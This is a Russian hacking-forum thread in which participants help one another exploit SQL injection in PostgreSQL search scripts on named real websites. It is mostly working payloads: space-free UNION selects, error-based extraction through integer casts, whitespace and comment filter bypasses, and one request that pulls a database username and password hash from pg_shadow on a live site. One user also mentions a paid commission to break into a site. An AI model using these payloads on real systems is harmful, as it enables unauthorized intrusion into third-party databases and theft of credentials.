![]() |
Имею дело с уязвимым поисковым скриптом. Свободно и без ошибок проходят все инъекции без пробелов и "+", например
?q=asd')OR(1=1)OR('sad'='ssd но стоит в запросе применить пробел, как выдаеца ошибка. поизучал скрипт, выяснил что это ииза того, что поисковик обрабатывает слова по отдельности, таксказать...чтобы круче искало... WHERE ((title ILIKE '%asd')%' AND title ILIKE '%or(1=1)or%') сопсна вопрос: что делать с этой гадостью, дабы была возможность человеческие инъекции проводить, а не "OR(1=1)"?? |
попробуй использовать
Код:
/**/ |
пробовал.... ему походу ваще на комментарии пофигу... только вот это я не знаю как объяснить
|
Например так
Код HTML:
(-1)union(select(1),2,3)Код HTML:
(-1)union(select(table_name),2,(3)from(information_schema.tables))Код HTML:
(-1)union(select(table_name),2,(3)from(information_schema.tables)where(table_name>'SCHEMA_PRIVILEGES')) |
чет ваще не канает...но на вопрос ответил, спс.
а вот еще такой момент: если известно что имею дело с PostgreSQL, то коректна такая связка? Код HTML:
OR(select(blabla)) |
Для постгреса валидны варианты
Код:
select"column_name"from"information_schema"."columns"where"table_name"=$$clients$$; |
чет всеравно выдает трехэтажную ошибку...
есть какойнить способ заставить его игнорировать остальную часть скрипта, кроме /* и # ? |
Ошибку-то покажите. В постгресе игнорирование остальной части запроса с помощью /* не выйдет - СУБД выдаст ошибку, ибо требует закрытия комментария. # тут вообще не поможет. Пробуйте
Код:
-- |
вбиваю к примеру
Код HTML:
http://site.ru/trade/future/?q=asd')OR(1=1)OR('ass'='asвместо 1=1 подставляю, к примеру select'1' на что мне отвечают Код HTML:
ERROR [2] pg_query() [function.pg-query]: Query failed: ERROR: failed to find conversion function from unknown to boolean on line 135 in file /castle/sites/site.ru/htdocs/includes/database/database.pgsql.php (page: /trade/future/?q=asd')OR(select'1')OR('ass'='as) Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.6.30 Version/10.61ERROR [2] pg_query() [function.pg-query]: Query failed: ERROR: failed to find conversion function from unknown to boolean on line 135 in file /castle/sites/site.ru/htdocs/includes/database/database.pgsql.php (page: /trade/future/?q=asd')OR(select'1')OR('ass'='as) Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.6.30 Version/10.61 |
Так?
Код:
http://site.ru/trade/future/?q=asd')OR(select'1')... |
Используй всякие дополнительные знаки, типа табебулятия, возврат-перевод каретки и т. д.
|
krypt3r
Ну эт то я и сам увидел, но как только не извращался с этим синтаксисом, не могу заставить его работать с 'select'ом. фантазия уже заканчиваеца XAMEHA опаопа! а вот тут поподробней плиз)) |
а может хватит гадать и ты просто ссылку выложишь?
|
Подкину пару вариантов
Код:
http://site.ru/trade/future/?q=asd')OR(1=((select(version()))::int))Запрос Код:
http://cat.rusbic.ru/?rgn=80&cn=-999)OR(1)=((select(version()))::int);--+Код:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 8.3.11 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2" in /var/www/rusbic/data/www/rusbic.ru/func/base.php on line 84Код:
http://cat.rusbic.ru/?rgn=80&cn=-999)OR(1)=((select"usename"||':'||"passwd"from"pg_shadow"limit(1)offset(0))::int);--+Код:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "postgres:md5ec63fc1e79539051850385b5ec9411fe" in /var/www/rusbic/data/www/rusbic.ru/func/base.php on line 84 |
Цитата:
Вот как можно избавиться от фильтрации пробелов: Вот статья их хакера: кажем, ты нашел инъекцию на крупном новостном портале, но никак не можешь ее раскрутить, так как все известные тебе варианты пробелов не работают. Давай рассмотрим такой код PHP код:
Как мы видим, при использовании пробелов " ", /**/, + и %20 скрипт прекращает свою работу. На самом деле существует как минимум два способа обхода такого скрипта, первый – использование различных пробельных символов, второй – использование логики SQL запросов, в частности их реализации в MySQL. 1. Итак, первый способ. Помимо самого пробела существует множество различных пробельных символов, табуляция, возврат каретки и так далее. Вот их полный (а может и нет ) список: %09 – horizontal tab, горизонтальная табуляция %0A – NL line feed, символ новой строки %0B – vertical tab, вертикальная табуляция %0C – NP form feed, символ новой страницы %0D – carriage return, возврат каретки Все эти символы будут рассматриваться как пробельные. Пример запроса: id=-1%0Aunion%0Aselect%0A1 C этим, я думаю, все понятно, перейдем ко второму варианту: 2. В MySQL есть возможность выполнять SQL-код в блоке комментариев, выглядит это примерно так: PHP код:
Цитата:
PHP код:
|
Аналогичная проблема, не получается сформировать корректный запрос. А именно отловить закомментировать остаток запроса.
Пример: http://www.roseltorg.ru/set/announce.php?id=10077'-- https://com.roseltorg.ru/file/get/t/Protocols/?id=1036%27%20order%20by%20100/* |
Цитата:
|
Цитата:
invalid input syntax for integer: "1test" переменная id без изменений попадает в запрос, никакого intval а там нету |
%0A, и все ок.
http://etp.roseltorg.ru/trade/future/?q=%27%29%0A--%0A1 |
Цитата:
|
интересуюти данные запросы:
http://www.roseltorg.ru/set/announce.php?id=10077'-- https://com.roseltorg.ru/file/get/t/Protocols/?id=1036%27%20order%20by%20100/* |
Цитата:
Мне этот сайт заказали за 300к WMR, потом снизили цену аж до 5k WMR. Поэтому осторожней с заказчиком, я его послал =\ [/offtop] |
| Время: 15:08 |